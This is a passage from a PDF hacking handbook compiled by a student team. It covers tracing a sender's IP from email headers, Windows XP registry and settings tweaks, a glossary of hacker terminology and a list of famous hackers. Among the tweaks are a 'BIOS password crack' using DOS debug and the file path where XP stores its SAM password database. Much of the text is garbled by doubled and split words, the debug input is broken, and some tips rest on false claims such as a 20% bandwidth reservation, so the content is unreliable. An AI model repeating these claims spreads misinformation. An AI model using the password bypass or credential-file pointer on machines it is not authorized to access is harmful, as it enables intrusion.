/* quit if pleasequit is set, and nextw>10 */
if (pleasequit && nextw > 10)
exit (0);
}
}
158
HOW TO TRACK **IP ADD*** How to find the IP address of the sender in Gmail ail, Yahoo! mail or Hotmail
When you receive an email, you receive more than just the message. The email comes with headers that carry important
information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP
address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the
sender
uses
anonymous
proxy
servers.
Finding IP address in Gmail
1.
Log
into
your
Gmail
account
with
your
username
and
password.
2. Open the mail. 3. To To display the headers, * Click on More options corresponding to that thread. You should get a bunch of links. * Click on Show original 4. You You should get headers like this: Gmail headers :x*x*x*x*x*x*x Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is
65.119.112.245. That is be the IP address of the sender! 5. Track the IP address of the sender sende r
Finding IP address in Yahoo! Mail
1. Log into your Yahoo! Yahoo! mail with your username and password. 2. Click on Inbox or whichever folder you have stored your mail. 3. Open the mail. 159
4. If you do not see the headers above the mail message, your headers are not displayed.To display the headers, * Click on Options on the top-right corner * In the Mail Options page, click on General Preferences * Scroll down to Messages where you have the Headers option * Make sure that Show all headers on incoming messages is selected * Click on the Save button * Go back to the mails and open that mail 5. You You should see similar headers like this: Yahoo! headers : x*x*x*x*x*x*x Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109. That is be the IP address of the sender! 6. Track the IP address of the sender sende r
Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password. 2. Click on the Mail tab on the top. 3. Open the mail. 4.If you do not see the headers above the mail message, your headers are not displayed.To display the headers, * Click on Options on the top-right corner * In the Mail Options page, click on Mail Display Settings * In Message Headers, make sure Advanced option is checked * Click on Ok button * Go back to the mails and open that mail 5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address Hotmail headers : X*x*x*x*x*x*x ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9. 6. If you find find a head header er with with Rece Receiv ived ed:: from from foll follow owed ed by a Gmai Gmaill prox proxy y like like this this Hotmail headers : X*x*x*x*x*x*x Look for Received: from followed by IP address within square brackets[]. 160
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9. 7. Or else if you have headers h eaders like this Hotmail headers : X*x*x*x*x*x*x Look for Received: from followed by IP address within square brackets[].In this case, the IP address of the sender is [61.83.145.129] (Spam (Spa m mail). Jump to step 9. 8. * If you have multiple Received: from headers, eliminate the ones that h ave proxy.anyknownserver.com. 9. Track the IP address of the sender sende r
Back
161
162
Hacking XP
Now let’s play with window XP How to Find a Lost File in your computer? To find this missing file first, select the 'Start' button (bottom left hand corner of your scre screen) en) then then sele select ct from from the the Star Startt menu menu list list that that opens opens,, 'Fin 'Find' d' then then 'Fil 'Files es or Fold Folder er'.'. When the 'Find: All Files' dialog box opens you are ready to find that missing file. If you did a simple search for all '.doc files' (being the Microsoft Word file suffix) you may bring up hundreds of Microsoft Word files. To help you narrow your search, if you can remember part of the file name eg; 'jim', when the full name maybe 'Jim Burns quote 2.5.02.doc' you will get fewer results. To make a partial word search type in the 'Named' field the word followed by an *, this is above the number 8, press 'shift key + 8' to replace missing word/s or letter/s eg; 'jim*.doc', then you will have fewer results. You You can use * before or after the partial word/s or letter/s. By default your hard drive will be selected in the 'Look in' field. To start your search press the 'Find Now' button and the results will be listed below. To make your search quicker if you save all your files inside your 'My Documents' folder select it in the 'Look in' field when you open the 'Find: All Files' dialog box. By selecting the 'My Documents' folder your computer only searches it instead of your whole hard drive 163
1)
XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.
2) 3)
Creating Shutdown Icon or One Click Shutdown: Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window Use
instructing this
path
you
to
in
enter
"Type
a
command
Location
of
line the
path. Item"
SHUTDOWN -s -t 01 4)
If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.
5)
Increasing Band-Width By 20%:
6)
Microsoft reserves 20% of your available bandwidth for their own purposes like Windows
Updates
and
interrogating
your
PC
etc
To get it back: Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to: Local Computer Policy then Computer Configuration then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth. 7)
Making Folders Private: Open My Computer Double-click the drive where Windows is installed (usually
drive (C:), unless you have more than one drive on your computer). If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive. Double-clic Double-click k the Documents Documents and Settings Settings folder. folder. Double-clic Double-click k your user folder folder. Right-click any folder in your user profile, and then click Properties. On the Sharing tab, select the Make this folder private so that only I have access to it check chec k box. 8)
To change Drive Letters: Go to Start > Control Panel > Administrative Tools > Computer Management,
Disk Management, then right-click the partition whose name you want to change 164
(click in the white area just below the word "Volume") and select "change drive letter and paths." From here you can add, remove or change drive letters and paths to the partition. 9)
Removing the Shortcut arrow from Desktop Icons: Goto
Start
then
Run
and
Enter
regedit.
Navigate
to
HKEY_CLASSE HKEY_CLASSES_ROOT S_ROOTlnkfil lnkfile. e. Delete Delete the IsShortcut IsShortcut registry registry value. You You may need to restart Windows XP. 10)
Get Drivers for your Devices:
Visit Windows Update (XP Only) Look at the left hand pane and under Other Options click Personalize Windows Update. Now in the right hand pane check the box - Display the link to the Windows Update Catalog under See Also Below Choose which categories and updates to display on Windows Update - make sure you check all the boxes you want shown. Click Save Settings Now look in the left hand pane under See Also click Windows Update Catalog and choose what what you' you're re looki looking ng for for. Choos Choosee eith either er MS upd updat ates es or driv driver erss for for hard hardwa ware re devi device ces. s. Start the Wizard and off you go. 11)
Customize Internet Explorer's Title Bar:
Open Open Regi Regist stry ry by goin going g to Star Startt then then Run Run and and En Ente terr rege regedi dit. t. Navi Naviga gate te to HKEY_CURRE HKEY_CURRENT_USER NT_USER\Soft \Software\ ware\Micro Microsoft\ soft\Inter Internet. net. Explorer\Ma Explorer\Main. in. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see. 12)
Disabling the use of Win Key:
If your are a gaming freak then you must be sick of the Win key in your keyboard. To disable use of Win key, key, open registry by going to Start then Run and an d entering regedit. Navigate to [HKEY_LOCA [HKEY_LOCAL_MACH L_MACHINE\S INE\SYSTEM YSTEM\Curr \CurrentCont entControlSet rolSet\Contr \Control\Key ol\Keyboard board Layout] Layout] . In this look for valu alue of "Scancode code Map" ap". Its binary data ata so be extr xtra care areful: Set its value to "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00" to disable the win key. key. 13)
Restarting
Windows
without
Restarting
the
Computer:
This one is again is. When you click on the SHUTDOWN button, make sure to simultaneous press SHIFT Button. If you hold the Shift key down while clicking 165
on SHUTDO SHUTDOWN WN button button,, you you compute computerr would would restar restartt without without restar restartin ting g the Computer. This is equivalent to term "HOT REBOOT". 14)
Stoppi Stopping ng XP from from display displaying ing unread unread messag messages es count count on Welcome elcome Screen: Screen: To stop stop XP from display displaying ing count count of unread unread messag messages, es, Open Open regist registry ry and navigate
to
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentV [HKEY_CURRENT_USER\Software\Microsoft\W indows\CurrentVersion\Unrea ersion\Unrea dMail] and look for the data key "MessageExpiryDays". If you do not see this key, create one DWORD key by the name "MessageExpiryDays". Setting its value value to 0 woul would d stop stop Windo indows ws XP from from disp display layin ing g the the count count of unre unread ad messages. Tools Icon To The Desktop: 15) Adding Administrative Tools Open Registry Editor. In Registry Editor, navigate to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Expl orer\D orer\Desk esktop top\Na \NameS meSpace pace . Create Create the follow following ing key: key: {D20EA {D20EA4E14E1-3957 3957-1 -11d21d2A40B-0C50205 A40B-0C5020524153} 24153} (just (just copy/paste, copy/paste, including including the brackets). brackets). Close Registry Registry Editor. There is no need to reboot. Just wait a few seconds and see how the icon appears. 16)
Creating The Suspend Shortcut:
Right click on the Desktop .New / Shortcut. Enter in rundll32.exe PowrProf.dll, SetSuspendState . Give it whatever name you want. Now when you click on that shortcut, your computer will shutdown and suspend. 17)
Disable XP Load Screen:
By disabling the load screen you can boost the boot up time by a couple of seconds, if not more. To disable the load screen, open the “msconfig” utility: go to Start>Run, type in “msconfig” without quotes and press Enter. In the subsequent window, select the ‘boot. ‘boot.ini ini’’ tab. tab. Check Check the /NOGUI /NOGUIBOO BOOT T option option and press press ‘Apply ‘Apply’. ’. Restar Restartt Windows to see the effect. 18)
To Remove Arrow Signs From Desktop Shortcuts:
Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key HKEY_CLASSES_ROOT\lnkfile\ and rename the string value IsShortcut to AriochIsShortcut 19)
Make Your Your Internet Explorer As Fast As FireFox:
Open registry editor by going to Start then Run and entering regedit. Once in registry,
navigate 166
to
key
HKEY_CURRENT_USER\Software\microsoft\Windows\CurrentV HKEY_CURRENT_USER\Software\microsoft\W indows\CurrentVersion\InternetSet ersion\InternetSet tings.
Right
click
@
windows
right
>
New
>
DWORD.
type
MaxConnectionsPerServer > You can set value (the more higher the no, the more good
speed
u
get,
e;g
:
99).
Create
another
DWORD
>type
MaxConnectionsPer1_0Server. Then put a high value as mentioned above. Restart I.E and you are done.
20)
Disable Disk Performance Counters
Win XP comes comes with with many many inbu inbuil iltt perf perfor orma manc ncee moni monito tori ring ng appli applicat catio ions ns that that constantly examine various parts of the system. This information can be of real use to a system administrator for collecting performance statistics. However, for a home user, these statistics hold no value and since the monitoring happens all the time, it consumes a good deal of system resources. “Disk monitoring”, for example, happens in the background, and turning it off is advisable if you will not be using the perfo performa rmance nce monito monitorin ring g applica applicatio tions. ns. To turn turn it off, off, type type in “diskp “diskperf erf -N” at a command prompt. To bring up the command prompt: go to Start>Run, type in “cmd” and press [Enter]. 21)
Removing Multiple Boot Screens:
If you are getting unwanted multiple boot screen Then Follow these Steps. 1> Right Right Click Click on My My Comput Computer er 2> Select Select Proper Propertie tiess 3> Select Select Advance Advanced d Tab Tab 4> Select Settings Settings In the the Startup Startup & Recovery Section( Section(3rd 3rd grp) 5> Select the operating operating syst system em which which u want. want. 6> And And Cli Click ck OK. OK. 7> Further Further again press press the setting setting and and click on Edit. Edit. 8> It will will open open boot.in boot.inii File. File. 9>
Now Now u can can dele delete te those hose o/s o/s whi which you don' don'tt want want to be dis display played ed..
Note: For deleting operating systems from boot.ini file, keep it mind that you can't
delete
that
o/s
which
is
selected
making any changes make a copy of boot.ini file. 22)
Enabling Hibernation:
167
by
default
there.
Before
Go to diplay properties>screen savers>power>hibernate. Check 'Ena ble Hibernation'. Press shift button after you click 'Turn Off Computer' in start menu. 23)
To Increase the Internet Speed:
Open Notepad and paste the below code in it. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Paramete rs] "SackOpts"=dword:00000001 "TcpWindowSize"=dword:0005ae4c "Tcp1323Opts"=dword:00000003 "DefaultTTL"=dword:00000040 "EnablePMTUBHDetect"=dword:00000000 "EnablePMTUDiscovery"=dword:00000001 "GlobalMaxTcpWindowSize"=dword:0005ae4c
Now save this file as speed.reg. Execute it and observe the change! 24)
Changing Your Dynamic IP Address:
1. Click on "Start" "Start" in in the bottom bottom left hand corner corner of screen screen 2.
Cli Click on "Run "Run""
3. Type ype in in "comm "command and"" and and hit hit okay 4. Type "ipconf "ipconfig ig /releas /release" e" just just like like that, that, and hit hit "enter" "enter" 5. Type ype "exit "exit"" and and leave leave the prompt prompt 6. Right-click Right-click on "Network "Network Places" Places" or "My Network Network Places Places"" on your desktop. desktop. 7. Clic Click k on on "pr "prope opert rtie ies" s" 8. Right click on "Local "Local Area Connection" Connection" and and click click "propertie "properties" s" 9. Doub Double le-c -cli lick ck on the the "Int "Inter erne nett Prot Protoc ocol ol (TCP (TCP/I /IP) P)"" from from the the list list unde underr the the "General" tab 10. 10. Cli Click on "Use Use the follo ollowi wing ng IP addr addres ess" s" unde underr the "Gen "Gener eral al"" tab tab 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until it fill the area up). 11. 11. Press "Tab" "Tab" and it should should automatically automatically fill in the "Subnet Mask" section with default numbers. 12. Hit the the "ok" button button here here 13. Hit the "ok" "ok" button button again
168
14. RightRight-cli click ck back back on "Local "Local Area Connectio Connection" n" and go to proper propertie tiess again. again. 16. Go back to the "TCP/IP" settings 17. This time, select "Obtain an IP addres
25)
BIOS PASSWORD CRACK
1)Boot up windows from CD. 2)Go to dos prompt or go to command prompt directly from the windows start up menu. 3)Type 3)Type the command at the prompt:"debug"(without quotes) quo tes) 4)Type 4)Type the following lines now exactly as given...
07010 07120 quit exit 4)Exit from the dos prompt and restart the machine.
PASSWORD PROTECTION IS GONE. Just make ur backup
26)
where is the windows xp administrator password saved??
C:/WINDOWS/SYSTEM32/CONFIG/SAM
27) )
Windows 2000 Workstation's log-in screen has a "Shutdown" button which you can use to shutdown the system without ever logging in. But you can disable Windows 2000 Workstation's "Shutdown" button on the initial log-in screen:
Run "RegEdit.exe" or "RegEdt32.exe" Select the following key:
HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows NT\ 169
Current Version\Winlogon Add a value named "ShutdownWithoutLogon" of type "REG_SZ" and set it to "0". Restart Windows 28)
Adding a Shortcut Key to Your Internet Connection
To add items when you right-click on the Start Button:
Start Regedit Go to HKey_Classes_Root / Directory / Shell Right-click on Shell and select New / Key Type in the name of the key and press the Enter key
In the Default name that shows in the right hand panel, you can add a title title with a & character in front of the letter for a shortcut
Right-click on the key you just created and create another key under it called command
For the value of this command, enter the full path and program you want to execute
Now when you right click on the Start Button, your new program will show up. You do not need to reboot first.
Back
170
171
Glossary Lexicon A hacker is anyone who enjoys the intellectual challenge of creatively overcoming or circumv circumvent enting ing limita limitati tions ons,, primar primarily ily in their their fields fields of intere interest, st, namely namely progra programmi mming ng or electrical engineering. As will be discussed below, there is a trend in the popular press to use the term to describe computer criminals, and others whose motivations are less pure than the traditional hacker, which trend greatly annoys many of those old-school computer/technology enthusiasts.
Origin of the term at MIT The term originally developed at MIT long before computers became common; a "hack" meant a simple, but often inelegant, solution. The term hack came to refer to any clever prank perpetrated perpetrated by b y MIT students; the perpetrator is a hacker . To this day the terms hack and hacker are used in that way at MIT, without necessarily referring to computers.
When MIT students surreptiously put a police car atop the dome on MIT's Building 10, that was a hack, and the students involved involved were therefore therefore hackers. hackers. Computer Computer culture at MIT developed when members of the Tech Model Railroad Club started working with a Digital Equipment Corporation PDP-1 computer and applied local model railroad slang to computers. In modern computer culture, the label "hacker" is a compliment, indicating a skilled and clever programmer. In the media, however, it has negative connotations and has become synonymous with "software cracker".
The term hacker is used in five senses in common use: use 1. Someone Someone who knows a (somet (sometime imess specif specified ied)) set of programmi programming ng interfac interfaces es well enough to write novel and an d useful software without conscious thought on a good day. 2. Someo Someone ne who who (usu (usual ally ly ille illegal gally ly)) atte attemp mpts ts to brea break k into into or other otherwi wise se subve subvert rt the the security of a program, system or network, often with malicious intent. This usage was annoy annoyin ing g to many many in the the devel develope operr commu communi nity ty who who grew grew up with with the the prim primar ary y meaning in sense (1), and preferred to keep it that way; they preferred the media used the term cracker. However this wound up causing even more problems as simply
172
creating a new word did nothing to dispel misconceptions. "Black hat hacker" is a phrase that wound up with the same problems as the word "cracker". 3. Someone who who attempts attempts to break break into systems systems or or networks networks in order order to help the the owners of the system by making them aware of security flaws in it. This is referred to by some as a "white hat hacker" or sneaker. Many of these people are employed by computer securi security ty compani companies, es, and are doing doing somethi something ng complet completely ely legal; legal; and many were were formerly hackers within sense 2. 4. Someone who, who, through through either either knowledge knowledge or trial trial and error error,, makes a modifi modification cation to to an existing piece of software, made available to the hacker community, such that it provides a change of functionality. Such change is normally a benefit. Rather than a compet competit itio ion, n, the the exch exchang angee of impr improv oveme ement ntss is most most ofte often n expe experi rien ence ced d as a cooperative learning effort. 5. A Reality Reality Hacker Hacker or Urban Urban Spelunker Spelunker (origin: (origin: MIT); MIT); someone someone who enjoys enjoys exploring exploring air ducts, rooftops, shafts and other hidden aspects of urban life, sometimes including pulling elaborate pranks for the enjoyment enjo yment and entertainment of the community. "Script kiddie" is reserved for a computer user of little or no skill who simply follows directions or uses a cook-book approach without fully understanding the meaning of the steps they are performing. "h4x0r" (pronounced Hacks-Or) is a script kiddie in the context of a computer game (i.e (i.e.. some someon onee who who uses uses a prog progra ram m to modi modify fy a game game givi giving ng them them speci special al and and unfai unfair r advantages). "h4x0r" is often used jokingly or as a term of endearment between gamers. Note that while the term hacker denotes competence, the noun hack often means kludge and thus has a negative connotation while the verb hack generally shares the same competent connotations. The hacker community (the set of people who would describe themselves as hackers, or who would be described by others as hackers) falls into at least three partially overlapping categories. The word hacker probably derives from the somewhat derogatory hack, used in the newspa newspaper per indust industry ry typica typically lly to refer refer to a Journa Journalis listt who types types his storie storiess without without checking his facts first.
173
Hacker -- Brilliant Programmer One who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day. This type of hacker is respected within the development community for the freedom they represent, although the term still carries some of the meaning of Hack, developing programs without adequate planning. This zugzwang sets freedom and the ability to be creative against methodical careful progress. Corporate programming environments typically favor only either the good hacke hackers rs or the the care carefu full comput computer er scie scient ntis ist. t. At thei theirr best best,, Hack Hacker erss can can be surp surpri risi sing ngly ly productive. Industry standard rates of development are in the range of 6-10 lines of code (debugged, and documented) per hour. A Hacker in stride can produce a few hundred or occasionally even thousands lines of code an hour by leveraging their previous work. As a result a Hacker may be able to sketch out the full shape of a program to a level of quality that can be used for demonstrating ideas in less than a week. Thus it isn't hard to see what some companies find useful in Hacker talent. The down side of Hacker productivity is generally agreed to be in maintainability, documentation, and completion. Very talented hackers may become bored with a project once they have figured out all of the hard parts, and be unwilling to finish off the details . This attitude can cause friction in shops where other programmers are expected to pick up the half finished work, decipher the structures and ideas, and bullet-proof the code. In other cases, where a Hacker is willing to maintain their own code, a company may be unable to find anyone else who is capable or willing to dig through code to maintain the program if the original programmer moves on to a new job.
Hacker -- Computer Criminal
174
The pop popul ular ar pres presss has has been been know known n to use use the the term termss "hac "hacker ker"" and occas occasio ional nally ly "cracker" for someone who attempts to break into or otherwise subvert the security of a system or network. Both usages are annoying to many in the developer community who grew up with the primary meaning of "hacker" in the Guru sense, and who don't see the problem solved by the invention of new and nebulous words like "cracker" or "black hat". Instead, there has been a move to define terms when describing these people. What makes someone a "hacker", a "computer criminal", or just a regular computer user? Once these details are known, the proper word (or combination) combination) can be accurately accurately applied. applied. While it will always always be possible to use one's "hacker" skills in a destructive way, this tends to go against the loosely defined defined hacker ethic. One can certainly use hacking skills to commit commit a crime. crime. However, However, this means that this particular hacker is now a criminal, vandal, malicious user, etc., existing word wordss that that do a much much bett better er job job of desc descri ribi bing ng the the pers person on's 's actio actions ns than than the the nebul nebulous ous "cracker". If a locksmith used his skills to break into a building, few would debate that he had crossed into the criminal world and there would be no need to invent a word to define criminal or malicious locksmiths. The reason hackers face these kinds of problems is because the mass media tends to believe anyone who says they are a hacker - and people say they are hackers because of the mass media's sensationalist portrayals. This deceptive cycle will probably only come to an end with the education of reporters and the general public on what constitutes a hacker and what does not. A group known as the "Hacker Antidefamation League" League" has this this goal.But goal.But,, indeed, indeed, it's it's likely likely that the confus confusion ion and disson dissonanc ancee exists exists precisely because "hacking" describes a *skill set* -- akin to picking locks -- whose tools can be used both ethically and unethically, by both people who are basically ethical, and those who are not (these (these are two relate related, d, but separa separate te distin distincti ctions ons -- what what long-t long-time ime system system administrator has not violated a company policy by breaking into some company facility for an authorized user in order that that person can complete an important project?) This may well be the crux of the argument, in fact: so-called 'white-hat' hackers are uncomfortable at the exposure of the darker side of their skill-set, notwithstanding the fact that, like comic book superheroes, they only utilize those skills for Good.Software cracking is the process of removing any sort of software enforced protection scheme from a piece of software.There are several recurring tools of the trade used by b y hackers to gain unauthorized access to computers:
Trojan horse h orse ho rse
175
These are applications that seem to do useful work, but set up a back ba ck door so that the hacker can later return and enter the system. These include programs which mimic login screens. Viruses that fool a user into downloading and/or executing them by pretending to be useful applications are also sometimes called trojan horses.
Snooper Applications Applications that capture password password and other data while it is in transit transit either within the computer, or over the network Virus -- An application that propagates itself opportunistically by waiting in the background until the user offers it a new medium to infect. The term came into usage by comparison with biological viruses, which reproduce by infecting a cell and taking advantage of its life functions. Similarly, computer viruses, unlike worms, embed themselves within files on the host system. When "infected" executables run, or sometimes when infected binary data files are read, the virus is able to spread to other binary format files on the local system, flop floppy py disk diskss or over over the the net network work.. Viruses uses are are oft often conf confus used ed with ith worm wormss. worm worm -- An applic applicati ation on that that active actively ly probes probes for kno known wn weaknes weaknesses ses across the network, then propagates itself through an exploitation of those weaknesses. The original Usenet post describing the MorrisWorm described the distinction between viruses and worms thus: worms do not attach themselves to code. Popular usage appears to favour worms being more active than viruses. However, the Jargon File, as of version 4.4.1, maintains the original sens sensee of the the term term.. A Worm in this this orig origin inal al sens sensee is any inde indepen pende dent nt progr program am whic which h reproduces itself over a network (a program reproducing itself on the local machine only repeatedly until the machine crashes is known as a wabbit). After the comparison between computer viruses and biological viruses, the obvious comparison co mparison here is to a bacterium.
Vulnerability Scanner A tool used to quickly check computers on a network for known weaknesses. Hackers also use Port Scanners. These check to see which ports on a specified computer are "open" or available to acess the computer through. Exploit (computer science) science -- A prepared application that takes advantage of a known weakness Social engineering -- Asking someone for the password or account (possibly over a 176
beer.) Also includes looking over someone's shoulder while they enter their password, or posing as someone else in order to get sensitive information Root Root kit kit -- A tool toolki kitt for for hidi hiding ng the the fact fact that that a comp comput uter er's 's secu securi rity ty has has been been compromised. Root kits may include replacements for system binaries so that it becomes impo imposs ssib ible le to see see appli applicat catio ions ns being being run run by the the intr intrude uderr in the the acti active ve proc proces esss tabl tables es.. Leet Lee -- An English pidgin that helps to obscure hacker discussions and web sites, and paradoxically it simplifies the location of resources in public search engines for those who know the language.
Hacker -- Grey Hat 1) A black-hat hacker turned white-hat. See below. below. 2) A white-hat hacker who uses black-hat techniques to satisfy their employers, for whom they act as white-hat.
177
Hacker -- White Hat White hat hackers often overlap with black hat depending on your perspective. The primary difference is that a white hat hacker observes the hacker ethic, a sort of golden rule of computing similar to: Do unto others as you would have them do unto you. Like black hats, white hats are often intimately familiar with the internal details of security systems, and can delve into obscure machine machine code when needed to find a solution to a tricky problem problem without requiring support from a system manufacturer. An example of a hack: Microsoft Windows ships with the ability to use cryptographic libraries built into the operating system. When shipped overseas this feature becomes nearly useless as the operating system will refuse to load cryptographic libraries that haven't been signed by Microsoft, and Microsoft will not sign a library unless the US Government authorizes it for export. This allows the US Government to maintain some perceived level of control over the use of strong cryptography beyond its borders. While hunting through the symbol table of a beta release of Windows, a couple of overseas hackers managed to find a second signing key in the Microsoft binaries. That is without disabling the libraries that are included with Windows (even overseas) these individuals learned of a way to trick the operating system into loading a library that hadn't been signed by Microsoft, thus enabling the functionality which had been lost to non-US users. Whether this is good (white hat) or bad (black hat) may depend on whether you are the US Government or not, but is generally considered by the computing community to be a white hat type of activity.
How Some Some Hackers Hackers Define Themselves Themselves The following is the definition given by the jargon file (a dictionary of hacker jargon) accepted by some (but not all) in the hacker community:
[originally, someone who wh o makes furniture with an axe] hacker n. [originally,
178
1. A person person who who enjoy enjoyss explo explori ring ng the the deta detail ilss of progr program amma mabl blee syst system emss and and how how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary. 2. One who program programss enthus enthusias iastic ticall ally y (even (even obsess obsessive ively ly)) or who enjoys enjoys programm programming ing rather than just theorizing about programming. 3. A perso person n capable capable of appr appreci eciati ating ng hack hack value. value. 4. A person who is is good good at programming programming quickly. quickly. 5. An expert at at a particular particular program, program, or or one who frequently frequently does work work using it or on it; as in `a Unix hacker'. (Definitions 1 through 5 are correlated, and people who fit them congregate.) 6. An expert or enthusiast enthusiast of any any kind. kind. One might be be an astronomy astronomy hacker hacker,, for example. example. 7. One who enjoys the intellectual intellectual challen challenge ge of creatively creatively overcoming overcoming or circumve circumventing nting limitations. 8. [depre [deprecat cated] ed] A malici malicious ous meddler meddler who tries tries to discove discoverr sensi sensitiv tivee inform informati ation on by poking around. Hence `password `password hacker', `network hacker'. The correct correct term for this sense is cracker cracke r. The term `hacker' also tends to connote membership in the global community defined by the net (see the network and Internet address). For discussion of some of the basics of this culture, see the How To Become A Hacker FAQ. It also implies that the person described is seen to subscribe to some version of the hacker ethic. It is better to be described as a hacker by others than to describe oneself that way. Hackers consider themselves something of an elite (a meritocracy based on ability), though one to which new members are gladly welcome. There is thus a certain ego satisfaction to be had in identifying yourself as a hacker (but if you claim to be one and are not, you'll quickly be labeled bogus). See also geek, wannabee. This term seems to have been first adopted as a badge in the 1960s by the hacker culture surrounding TMRC and the MIT AI Lab. We have a report that it was used in a sense close to this entry's by teenage radio hams and electronics tinkerers in the mid-1950s.
179
Notable Hackers Richard Stallman -- A hacker of the old school, Stallman walked in off the street and got a job at MIT's Artificial Intelligence Lab in 1971. Stallman is a legendary hacker, the foun founder der of the the free free soft softwa ware re movem movemen ent, t, a MacA MacArt rthu hurr "geni "genius us grant grant"" reci recipi pient ent and a programmer capable of prodigious exploits. Ken Thompson an d Dennis Ritchie -- The driving creative force behind Bell Labs' legendary computer science operating group, Ritchie and Thompson created UNIX in 1969. Steve Wozniak -- The co-founder of Apple Computer got his start making devices for phone phreaking. Linus Torvalds -- Torvalds was a computer science student at the University of Helsinki when he wrote the Linux kernel in 1991. Eric S. Raymond Raymond -- He is one of the founder of the Open Source Initiative Initiative and he wrote the famous text The Cathedral and the Bazaar and many other essays. essays. He also maintains maintains the Jargon Jargon File for the Hacker culture, which was previously maintained by Guy L. Steele, Jr.. Larry Wall -The creator of the Perl programming language. Johan Helsingius -- Operated the world's most popular popular anonymous remailer, remailer, the Penet remailer remailer (called penet.fi), penet.fi), until he closed closed up shop in Septembe Septemberr 199 1996. 6. Tsutomu sutomu Shimomu Shimomura ra -- Shimom Shimomura ura outhac outhacked ked and outsma outsmarte rted d Kevin Kevin Mitnick, the United States's most infamous hacker, in early 1994.
Back
180
PREPARED BY •
NIKHIL KHANDELWAL (Leader, Supervisor, Supervisor, Page Designer )
•
RAHUL GUPTA (Ass. Leader, Editor, Editor, Page Designer )
•
ARPIT GARG (Main Source Collector, Page Designer )
•
MRIGESH BHANDARI (Source Collector)
•
SHIKHA AGARWAL (Source Collector)
•
NEHA JAIN (Source Collector)
•
MANISH PUROHIT (Source Collector)
Back
181